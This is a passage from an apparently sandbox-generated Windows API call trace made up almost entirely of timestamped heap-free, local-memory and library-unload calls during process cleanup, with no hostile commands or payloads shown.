GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da900 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da880 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x19ee90 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1da8a0 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca850 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca8b0 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca890 | out: hHeap=0x150000) returned 1 [0169.121] GetProcessHeap () returned 0x150000 [0169.121] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1ca830 | out: hHeap=0x150000) returned 1 [0172.509] GetProcessHeap () returned 0x150000 [0172.509] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1af400 | out: hHeap=0x150000) returned 1 [0172.509] FreeLibrary (hLibModule=0x1440000) returned 1 [0172.509] FreeLibrary (hLibModule=0x7fef4310000) returned 1 [0172.859] free (_Block=0x307e80) [0173.015] LocalFree (hMem=0x1763e0) returned 0x0 [0173.015] LocalFree (hMem=0x176730) returned 0x0 [0173.015] LocalFree (hMem=0x176840) returned 0x0 [0173.015] LocalFree (hMem=0x174ee0) returned 0x0 [0173.015] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x1d7580 [0173.015] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x174ee0 [0173.015] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1d5cb0 [0173.015] free (_Block=0x305a90) [0173.015] free (_Block=0x0) [0173.015] free (_Block=0x305a70) [0173.015] free (_Block=0x305ab0) [0173.015] free (_Block=0x307e60) [0173.015] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x1de9e0 [0173.336] LocalFree (hMem=0x1de9e0) returned 0x0 [0173.336] LocalFree (hMem=0x176860) returned 0x0 [0173.336] LocalFree (hMem=0x1d7580) returned 0x0 [0173.336] free (_Block=0x307c50) [0173.336] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x7fefee20000 [0173.336] FreeLibrary (hLibModule=0x7fefee20000) returned 1 [0173.336] LocalFree (hMem=0x1d5cb0) returned 0x0 [0173.336] LocalFree (hMem=0x174ee0) returned 0x0 [0173.337] GlobalHandle (pMem=0x1761c0) returned 0x9c0008 [0173.337] GlobalUnlock (hMem=0x9c0008) returned 0 [0173.344] FreeLibrary (hLibModule=0x7fef3770000) returned 1 [0173.345] FreeLibrary (hLibModule=0x7fef43b0000) returned 1 [0173.347] FreeLibrary (hLibModule=0x7fef3ef0000) returned 1 [0173.349] FreeLibrary (hLibModule=0x7fef3ee0000) returned 1 [0173.349] FreeLibrary (hLibModule=0x7fef3630000) returned 1 [0173.351] FreeLibrary (hLibModule=0x7fef35b0000) returned 1 [0173.352] FreeLibrary (hLibModule=0x7fef3ec0000) returned 1 [0173.353] FreeLibrary (hLibModule=0x7fef3550000) returned 1 [0173.355] FreeLibrary (hLibModule=0x7fef3540000) returned 1 [0173.360] FreeLibrary (hLibModule=0x7fef3530000) returned 1 [0173.418] FreeLibrary (hLibModule=0x7fef3520000) returned 1 [0173.419] FreeLibrary (hLibModule=0x7fef3500000) returned 1 [0173.420] FreeLibrary (hLibModule=0x7fef33f0000) returned 1 [0173.644] FreeLibrary (hLibModule=0x7fef32f0000) returned 1 [0173.808] FreeLibrary (hLibModule=0x7fef3af0000) returned 1 [0173.812] FreeLibrary (hLibModule=0x7fef41c0000) returned 1 [0173.815] FreeLibrary (hLibModule=0x7fef4190000) returned 1 [0173.821] FreeLibrary (hLibModule=0x7fef4130000) returned 1 [0173.822] FreeLibrary (hLibModule=0x7fef3a20000) returned 1 [0173.830] FreeLibrary (hLibModule=0x7fef3930000) returned 1 [0173.833] GetProcessHeap () returned 0x150000 [0173.833] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1a51a0 | out: hHeap=0x150000) returned 1 [0173.833] GetProcessHeap () returned 0x150000 [0173.833] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1726f0 | out: hHeap=0x150000) returned 1 [0173.833] GetProcessHeap () returned 0x150000 [0173.833] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172710 | out: hHeap=0x150000) returned 1 [0173.833] GetProcessHeap () returned 0x150000 [0173.833] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172730 | out: hHeap=0x150000) returned 1 [0173.833] GetProcessHeap () returned 0x150000 [0173.833] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172750 | out: hHeap=0x150000) returned 1 [0173.833] GetProcessHeap () returned 0x150000 [0173.833] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172770 | out: hHeap=0x150000) returned 1 [0173.833] GetProcessHeap () returned 0x150000 [0173.833] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172790 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1727e0 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172800 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172820 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172840 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172860 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172880 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1728a0 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1728c0 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1728e0 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172900 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172920 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172940 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172960 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172980 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1729a0 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1729c0 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1729e0 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.834] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172a00 | out: hHeap=0x150000) returned 1 [0173.834] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172a20 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172a40 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172a60 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172a80 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172aa0 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172ac0 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172ae0 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172b00 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172b20 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172b40 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172b60 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172b80 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172ba0 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172bc0 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172be0 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172c00 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172c20 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172c40 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172c60 | out: hHeap=0x150000) returned 1 [0173.835] GetProcessHeap () returned 0x150000 [0173.835] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172c80 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172ca0 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172cc0 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172ce0 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172d00 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172d20 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172d40 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172d60 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172d80 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172da0 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172dc0 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172de0 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172e00 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172e20 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172e40 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172e60 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172e80 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172ea0 | out: hHeap=0x150000) returned 1 [0173.836] GetProcessHeap () returned 0x150000 [0173.836] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172ec0 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172ee0 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172f00 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172f20 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172f40 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172f60 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172f80 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x172fe0 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173000 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173020 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173040 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173060 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173080 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1730a0 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1730c0 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1730e0 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173100 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173120 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.837] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173140 | out: hHeap=0x150000) returned 1 [0173.837] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173160 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173180 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1731a0 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1731c0 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1731e0 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173200 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173220 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173240 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173260 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173280 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1732a0 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1732c0 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1732e0 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173300 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173320 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173340 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173360 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173380 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1733a0 | out: hHeap=0x150000) returned 1 [0173.838] GetProcessHeap () returned 0x150000 [0173.838] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1733c0 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1733e0 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173400 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173420 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173440 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173460 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173480 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1734a0 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1734c0 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1734e0 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173500 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173520 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173540 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173560 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.839] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173580 | out: hHeap=0x150000) returned 1 [0173.839] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1735a0 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1735c0 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1735e0 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173600 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173620 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173640 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173660 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173680 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1736a0 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1736c0 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1736e0 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173700 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173720 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173740 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173760 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173780 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1737e0 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173800 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173820 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.840] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173840 | out: hHeap=0x150000) returned 1 [0173.840] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173860 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173880 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1738a0 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1738c0 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1738e0 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173900 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173920 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173940 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173960 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x173980 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1739a0 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1739c0 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: hHeap=0x150000, dwFlags=0x0, lpMem=0x1739e0 | out: hHeap=0x150000) returned 1 [0173.841] GetProcessHeap () returned 0x150000 [0173.841] HeapFree (in: 